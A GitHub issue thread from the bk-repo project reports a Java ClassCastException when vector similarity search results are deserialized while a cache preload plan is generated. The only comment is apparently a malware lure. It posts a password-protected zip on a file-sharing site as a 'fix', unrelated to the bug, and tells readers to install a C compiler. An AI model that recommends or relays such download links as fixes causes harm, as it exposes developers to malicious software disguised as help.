### ISSUE TITLE
生成预加载计划时向量化结果反序列化失败

### ISSUE THREAD

**Issue by cnlkl** [TencentBlueKing/bk-repo#2626]
**What happened**:

反序列化失败

```
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.lang.Double
	at com.tencent.bkrepo.job.batch.task.cache.preload.ai.milvus.MilvusVectorStore.similaritySearch(MilvusVectorStore.kt:111)
	at com.tencent.bkrepo.job.batch.task.cache.preload.ArtifactSimilarityPreloadPlanGenerator.calculateExecuteTime(ArtifactSimilarityPreloadPlanGenerator.kt:87)
```

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
